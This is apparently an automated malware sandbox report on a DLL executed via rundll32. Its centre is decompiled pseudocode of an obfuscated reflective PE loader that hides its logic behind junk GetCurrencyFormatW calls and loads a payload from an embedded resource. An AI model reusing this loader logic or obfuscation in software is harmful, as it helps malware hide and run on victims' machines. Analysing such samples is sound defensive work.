                                                                                                            0x10004643
                                                                                                            0x1000465f
                                                                                                            0x1000467b
                                                                                                            0x10004694
                                                                                                            0x100046b3
                                                                                                            0x100046cf
                                                                                                            0x100046eb
                                                                                                            0x10004707
                                                                                                            0x10004723
                                                                                                            0x1000473f
                                                                                                            0x1000475b
                                                                                                            0x10004777
                                                                                                            0x10004790
                                                                                                            0x100047a3
                                                                                                            0x100047cd
                                                                                                            0x100047f4
                                                                                                            0x10004824
                                                                                                            0x10004836
                                                                                                            0x10004849
                                                                                                            0x1000485c
                                                                                                            0x1000486f
                                                                                                            0x10004882
                                                                                                            0x10004895
                                                                                                            0x100048a8
                                                                                                            0x100048be
                                                                                                            0x100048d1
                                                                                                            0x100048e4
                                                                                                            0x100048f7
                                                                                                            0x10004901
                                                                                                            0x1000491d
                                                                                                            0x10004930
                                                                                                            0x10004943
                                                                                                            0x10004959
                                                                                                            0x1000496c
                                                                                                            0x1000497f
                                                                                                            0x10004992
                                                                                                            0x100049a5
                                                                                                            0x100049b8
                                                                                                            0x100049cb
                                                                                                            0x100049d0
                                                                                                            0x100049d5
                                                                                                            0x100049e6
                                                                                                            0x100049eb
                                                                                                            0x100049f6
                                                                                                            0x10004a04
                                                                                                            0x10004a0c
                                                                                                            0x10004a12
                                                                                                            0x10004a17
                                                                                                            0x10004a18
                                                                                                            0x10004a1e
                                                                                                            0x10004a24
                                                                                                            0x10004a25
                                                                                                            0x10004a26
                                                                                                            0x10004a27
                                                                                                            0x10004a28
                                                                                                            0x10004a9e
                                                                                                            0x10004aa2
                                                                                                            0x10004ac9
                                                                                                            0x10004ac9
                                                                                                            0x10004ad3
                                                                                                            0x10004a2a
                                                                                                            0x10004a38
                                                                                                            0x10004a7c
                                                                                                            0x10004a7c
                                                                                                            0x10004ad9
                                                                                                            0x10004ae2
                                                                                                            0x10004ae5
                                                                                                            0x10004af0
                                                                                                            0x10004afd
                                                                                                            0x10004b0f
                                                                                                            0x10004b26
                                                                                                            0x10004b2f
                                                                                                            0x10004b37
                                                                                                            0x10004b3c
                                                                                                            0x10004b47
                                                                                                            0x10004b4c
                                                                                                            0x10004b52
                                                                                                            0x10004b53
                                                                                                            0x10004b55
                                                                                                            0x00000000
                                                                                                            0x10004b55
                                                                                                            0x1000431e
                                                                                                            0x10004b76

                                                                                                            APIs
                                                                                                              • Part of subcall function 100036FA: _malloc.LIBCMT ref: 10003700
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004452
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000446E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000448A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100044A6
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100044C2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100044DE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100044FA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004516
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004532
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000454E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000456A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004586
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100045A2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100045BE
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100045DA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100045F6
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004612
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000462E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000464A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004666
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004682
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000469E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100046BA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100046D6
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100046F2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000470E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000472A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004746
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004762
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000477E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000479A
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 1000155F
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 100015B5
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 100015DF
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001606
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001639
                                                                                                              • Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001668
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016B0
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016D0
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016E8
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001710
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001731
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001757
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001770
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 1000179B
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017B7
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017DF
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017FA
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001826
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001844
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001879
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001899
                                                                                                              • Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100018BE
                                                                                                            • FindResourceW.KERNEL32(?,00003275,10036C5C), ref: 100049EB
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100049FA
                                                                                                            • SizeofResource.KERNEL32(?,?), ref: 10004A0C
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004A2A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004A49
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004A62
                                                                                                            • VirtualAllocExNuma.KERNEL32(000000FF,00000000,?,?), ref: 10004A7C
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004A84
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004AA2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10004ABB
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,?), ref: 10004AD3
                                                                                                            • memcpy.MSVCRT ref: 10004AE5
                                                                                                            • malloc.MSVCRT ref: 10004AF0
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10004B2F
                                                                                                            • _printf.LIBCMT ref: 10004B60
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$Resource$AllocVirtual$??3@FindLoadNumaSizeof_malloc_printfmallocmemcpy
                                                                                                            • String ID: .$.$.$3$c$d$d$d$d$e$e$eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$k$l$l$l$l$l$l$l$m$n$n$r$s$t$t$u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m($v$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3325861097-4060776750
                                                                                                            • Opcode ID: 66ea2a91fe368a831aadb18a4e90e5ef0f40db8b5cb4f279c8b13da558b103b3
                                                                                                            • Instruction ID: abf1217519c19ffa8c1e819e0abff0726c6fc8cdfe709489ff9e1ea74d27783b
                                                                                                            • Opcode Fuzzy Hash: 66ea2a91fe368a831aadb18a4e90e5ef0f40db8b5cb4f279c8b13da558b103b3
                                                                                                            • Instruction Fuzzy Hash: 8922A074544314BAF315DB91CE8AF0BBBECEF8A744F015509F740AA2A0D772A5248F6B
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100039A9 Relevance: 111.0, APIs: 60, Strings: 3, Instructions: 767COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 74 100039a9-10003a05 GetCurrencyFormatW * 2 call 10001e20 77 10003a07-10003a09 74->77 78 10003a0e-10003a31 GetCurrencyFormatW 74->78 79 10004247-1000424e 77->79 78->77 80 10003a33-10003a7a GetCurrencyFormatW * 2 call 10001e20 78->80 80->77 83 10003a7c-10003abe GetCurrencyFormatW * 2 80->83 83->77 84 10003ac4-10003ae8 GetCurrencyFormatW 83->84 84->77 85 10003aee-10003b0b GetCurrencyFormatW 84->85 85->77 86 10003b11-10003b67 GetCurrencyFormatW * 2 85->86 87 10003c26-10003cf4 GetCurrencyFormatW GetNativeSystemInfo GetCurrencyFormatW * 2 call 10001de9 GetCurrencyFormatW * 3 call 10001de9 86->87 88 10003b6d-10003b74 86->88 87->77 99 10003cfa-10003d87 GetCurrencyFormatW * 4 87->99 90 10003b78-10003b8b 88->90 92 10003ba2-10003bb1 GetCurrencyFormatW 90->92 93 10003b8d-10003ba0 GetCurrencyFormatW 90->93 95 10003bb4-10003bd5 GetCurrencyFormatW 92->95 93->95 97 10003bf4-10003c20 GetCurrencyFormatW 95->97 98 10003bd7-10003bf0 GetCurrencyFormatW 95->98 97->87 97->90 98->97 101 10003e14-10003e7b GetCurrencyFormatW * 2 GetProcessHeap HeapAlloc GetCurrencyFormatW 99->101 102 10003d8d-10003e0e GetCurrencyFormatW * 4 99->102 103 10003ead-10003f72 GetCurrencyFormatW * 4 call 10001e20 101->103 104 10003e7d-10003ea8 GetCurrencyFormatW 101->104 102->77 102->101 109 100041d1-100041db call 10003567 103->109 110 10003f78-100040be GetCurrencyFormatW * 4 memcpy GetCurrencyFormatW * 5 call 10001e51 103->110 104->77 109->77 110->109 116 100040c4-100040ed GetCurrencyFormatW 110->116 117 10004155 116->117 118 100040ef-10004153 GetCurrencyFormatW * 2 call 1000290c GetCurrencyFormatW 116->118 120 1000415c-10004181 GetCurrencyFormatW call 10002bde 117->120 118->120 120->109 124 10004183-100041a0 GetCurrencyFormatW call 10002482 120->124 126 100041a5-100041a8 124->126 126->109 127 100041aa-100041cf GetCurrencyFormatW call 10002863 126->127 127->109 130 100041e0-100041eb 127->130 131 10004244 130->131 132 100041ed-100041fa 130->132 131->79 133 10004223-1000423b GetCurrencyFormatW 132->133 134 100041fc-10004221 GetCurrencyFormatW 132->134 135 1000423e-10004242 133->135 134->135 135->79
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E100039A9(void* __eflags, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* _v0;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				int _v48;
				intOrPtr* _v52;
				int _v56;
				int _v60;
				intOrPtr* _v64;
				void* __esi;
				signed int _t155;
				signed int _t166;
				signed int _t186;
				int _t187;
				signed int _t193;
				signed int _t198;
				void* _t202;
				signed int _t205;
				signed int _t210;
				int _t223;
				signed int _t224;
				signed int _t227;
				intOrPtr* _t234;
				signed int _t235;
				intOrPtr _t238;
				signed int _t242;
				signed int _t275;
				signed int _t283;
				signed short* _t286;
				intOrPtr* _t302;
				signed int _t306;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t323;
				int _t336;
				int _t343;
				intOrPtr* _t407;
				short* _t447;
				int* _t448;
				int* _t449;

				_t448 =  &_v60;
				_t447 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v44 = 0;
				_t155 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _a8, _t155 *  *0x100440d0 + 0x40) != 0) {
					if(( *_a4 & 0x0000ffff) != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x5a4d) {
						goto L1;
					}
					_t166 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
					if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _a8, _t166 *  *0x100440d8 + _a4[0x1e] + 0xf8) == 0) {
						goto L1;
					}
					_v56 = _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + _a4[0x1e];
					if( *_v56 != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 0x4550 || ( *(_v56 + 4) & 0x0000ffff) != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + 0x14c || ( *(_v56 + 0x38) & GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x00000001) != 0) {
						goto L1;
					} else {
						_t186 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t187 = _v56;
						_v40 =  *((intOrPtr*)(_t187 + 0x38));
						_v52 = ( *(_t187 + 0x14) & 0x0000ffff) + _t186 *  *0x100440d8 * 0x28 + _t187 + 0x18;
						_v48 = 0;
						if(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + ( *(_v56 + 6) & 0x0000ffff) == 0) {
							L15:
							_t193 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							 *0x10046a40(); // executed
							_t198 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t202 = E10001DE9(_t198 *  *0x100440e0 + _v36, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v60 + 0x50)));
							 *_t448 = 0x22b9;
							_v52 = _t202 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", _t448 + 0x28 + _t193 *  *0x100440d8 * 0x24) *  *0x100440d8;
							_t205 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							if(_v52 != E10001DE9(_t205 *  *0x100440e0 + _v36, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + _v48)) {
								goto L1;
							}
							_t210 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_v44 = _t210 *  *0x100440d4 + 0x2000;
							_t223 = _a8(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v60 + 0x34)), _v52, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 0x00001000 | _v44, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 4, _a28);
							_t449 =  &(_t448[5]);
							_v56 = _t223;
							if(_t223 != 0) {
								L18:
								_t224 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
								_t227 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
								_v44 = HeapAlloc(GetProcessHeap(), _t227 *  *0x100440dc + 8, _t224 *  *0x100440d0 + 0x40);
								_t234 = _v44 + (GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6);
								_v64 = _t234;
								if(_t234 != 0) {
									 *((intOrPtr*)(_t234 + 4)) = _v56;
									_t235 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									_t238 = _v64;
									asm("sbb ecx, ecx");
									 *(_t238 + 0x14) =  ~( ~(_t235 *  *0x100440dc + 0x00002000 &  *(_v60 + 0x16) & 0x0000ffff));
									 *((intOrPtr*)(_t238 + 0x1c)) = _a8;
									 *((intOrPtr*)(_t238 + 0x20)) = _a12;
									 *((intOrPtr*)(_t238 + 0x24)) = _a16;
									 *((intOrPtr*)(_t238 + 0x28)) = _a20;
									 *((intOrPtr*)(_t238 + 0x2c)) = _a24;
									 *((intOrPtr*)(_t238 + 0x34)) = _a28;
									 *((intOrPtr*)(_v64 + 0x3c)) = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + _v36;
									_t242 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									if(E10001E20(_a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8, _t242 *  *0x100440cc +  *((intOrPtr*)(_v60 + 0x54))) == 0) {
										L28:
										E10003567(_v64);
										goto L1;
									}
									_v48 = _a8(_v56, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_v60 + 0x54)), GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 4, _a28);
									memcpy(_v48, _v0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v60 + 0x54)));
									_v44 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 * 0xf8;
									 *_v64 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _v44 + _v48 +  *((intOrPtr*)(_v0 + 0x3c));
									 *((intOrPtr*)( *_v64 + 0x34)) = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + _v56;
									_t275 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									if(E10001E51(_v0, _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8, _v60, (_t275 *  *0x100440d0 << 6) + _v64) == 0) {
										goto L28;
									}
									_t283 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									_t407 = _v64;
									_t286 = _t283 *  *0x100440cc +  *((intOrPtr*)( *_t407 + 0x34)) -  *((intOrPtr*)(_v60 + 0x34));
									_a4 = _t286;
									if(_t286 == 0) {
										 *((intOrPtr*)(_t407 + 0x18)) = 1;
									} else {
										_t308 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
										_a4 = E1000290C((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6) + _v64, _a4 + _t308 *  *0x100440d8);
										 *((intOrPtr*)(_v64 + 0x18)) = _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0;
									}
									if(E10002BDE((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 << 6) + _v64) == 0 || E10002482((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6) + _v64) == 0 || E10002863((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 << 6) + _v64) == 0) {
										goto L28;
									} else {
										_t302 = _v64;
										if( *((intOrPtr*)( *_t302 + 0x28)) == 0) {
											 *((intOrPtr*)(_t302 + 0x38)) = 0;
											return _t302;
										}
										_push(0x22b9);
										_push(L"xadqsavcbdfewescGADW");
										_push(0);
										_push(_t447);
										_push(0x11d4);
										_push(0);
										if( *((intOrPtr*)(_t302 + 0x14)) == 0) {
											 *((intOrPtr*)(_v64 + 0x38)) = GetCurrencyFormatW() *  *0x100440d0 +  *((intOrPtr*)( *_v64 + 0x28)) + _v56;
										} else {
											_t306 = GetCurrencyFormatW();
											_t307 = _v64;
											 *0x10046a88 = _t306 *  *0x100440d0 +  *((intOrPtr*)( *_t307 + 0x28)) + _v56;
											 *((intOrPtr*)(_t307 + 0x10)) = 1;
										}
										return _v64;
									}
								}
								_a12(_v56, 0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + 0x8000, _a28);
								goto L1;
							}
							_t323 = GetCurrencyFormatW(_t223, 0x11d4, _t447, _t223, L"xadqsavcbdfewescGADW", 0x22b9);
							_v44 = _t323 *  *0x100440d0 + 0x2000;
							_t336 = _a8(0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v52, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x00001000 | _v44, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 4, _a28);
							_t449 =  &(_t449[5]);
							_v56 = _t336;
							if(_t336 == 0) {
								goto L1;
							}
							goto L18;
						}
						_v52 = _v52 + 0xc;
						do {
							_push(0x22b9);
							_push(L"xadqsavcbdfewescGADW");
							_push(0);
							_push(_t447);
							_push(0x11d4);
							_push(0);
							if( *((intOrPtr*)(_v52 + 4)) != 0) {
								_t343 = GetCurrencyFormatW() *  *0x100440d4 +  *_v52 +  *((intOrPtr*)(_v52 + 4));
							} else {
								_t343 = GetCurrencyFormatW() *  *0x100440d4 +  *_v52 + _v40;
							}
							_v60 = _t343;
							if(_v60 > GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v44) {
								_v44 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc + _v60;
							}
							_v48 = _v48 + 1;
							_v52 = _v52 + 0x28;
						} while (_v48 < GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + ( *(_v56 + 6) & 0x0000ffff));
						goto L15;
					}
				}
				L1:
				return 0;
			}











































                                                                                                            0x100039a9
                                                                                                            0x100039c4
                                                                                                            0x100039d1
                                                                                                            0x100039d5
                                                                                                            0x10003a05
                                                                                                            0x10003a31
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003a3f
                                                                                                            0x10003a7a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003aa6
                                                                                                            0x10003abe
                                                                                                            0x00000000
                                                                                                            0x10003b11
                                                                                                            0x10003b1d
                                                                                                            0x10003b28
                                                                                                            0x10003b3e
                                                                                                            0x10003b4c
                                                                                                            0x10003b50
                                                                                                            0x10003b67
                                                                                                            0x10003c26
                                                                                                            0x10003c32
                                                                                                            0x10003c43
                                                                                                            0x10003c55
                                                                                                            0x10003c85
                                                                                                            0x10003c8a
                                                                                                            0x10003cb9
                                                                                                            0x10003cbd
                                                                                                            0x10003cf4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003d0b
                                                                                                            0x10003d29
                                                                                                            0x10003d7a
                                                                                                            0x10003d7e
                                                                                                            0x10003d83
                                                                                                            0x10003d87
                                                                                                            0x10003e14
                                                                                                            0x10003e20
                                                                                                            0x10003e39
                                                                                                            0x10003e5f
                                                                                                            0x10003e75
                                                                                                            0x10003e77
                                                                                                            0x10003e7b
                                                                                                            0x10003ebd
                                                                                                            0x10003ec0
                                                                                                            0x10003edb
                                                                                                            0x10003ee1
                                                                                                            0x10003ee5
                                                                                                            0x10003eec
                                                                                                            0x10003ef3
                                                                                                            0x10003f00
                                                                                                            0x10003f09
                                                                                                            0x10003f11
                                                                                                            0x10003f1b
                                                                                                            0x10003f3b
                                                                                                            0x10003f3e
                                                                                                            0x10003f72
                                                                                                            0x100041d1
                                                                                                            0x100041d5
                                                                                                            0x00000000
                                                                                                            0x100041da
                                                                                                            0x10003fe4
                                                                                                            0x10004001
                                                                                                            0x10004031
                                                                                                            0x1000405b
                                                                                                            0x1000407e
                                                                                                            0x10004081
                                                                                                            0x100040be
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100040d0
                                                                                                            0x100040d9
                                                                                                            0x100040e6
                                                                                                            0x100040e9
                                                                                                            0x100040ed
                                                                                                            0x10004155
                                                                                                            0x100040ef
                                                                                                            0x100040fb
                                                                                                            0x10004139
                                                                                                            0x10004150
                                                                                                            0x10004150
                                                                                                            0x10004181
                                                                                                            0x00000000
                                                                                                            0x100041e0
                                                                                                            0x100041e0
                                                                                                            0x100041eb
                                                                                                            0x10004244
                                                                                                            0x00000000
                                                                                                            0x10004244
                                                                                                            0x100041f0
                                                                                                            0x100041f1
                                                                                                            0x100041f6
                                                                                                            0x100041f7
                                                                                                            0x100041f8
                                                                                                            0x100041f9
                                                                                                            0x100041fa
                                                                                                            0x1000423b
                                                                                                            0x100041fc
                                                                                                            0x100041fc
                                                                                                            0x10004207
                                                                                                            0x10004214
                                                                                                            0x1000421a
                                                                                                            0x1000421a
                                                                                                            0x00000000
                                                                                                            0x1000423e
                                                                                                            0x10004181
                                                                                                            0x10003ea1
                                                                                                            0x00000000
                                                                                                            0x10003ea5
                                                                                                            0x10003d97
                                                                                                            0x10003db5
                                                                                                            0x10003e01
                                                                                                            0x10003e05
                                                                                                            0x10003e0a
                                                                                                            0x10003e0e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003e0e
                                                                                                            0x10003b74
                                                                                                            0x10003b78
                                                                                                            0x10003b7c
                                                                                                            0x10003b7d
                                                                                                            0x10003b87
                                                                                                            0x10003b88
                                                                                                            0x10003b89
                                                                                                            0x10003b8a
                                                                                                            0x10003b8b
                                                                                                            0x10003bb1
                                                                                                            0x10003b8d
                                                                                                            0x10003b9c
                                                                                                            0x10003b9c
                                                                                                            0x10003bc0
                                                                                                            0x10003bd5
                                                                                                            0x10003bf0
                                                                                                            0x10003bf0
                                                                                                            0x10003bf4
                                                                                                            0x10003bf8
                                                                                                            0x10003c1c
                                                                                                            0x00000000
                                                                                                            0x10003b78
                                                                                                            0x10003abe
                                                                                                            0x10003a07
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100039D5
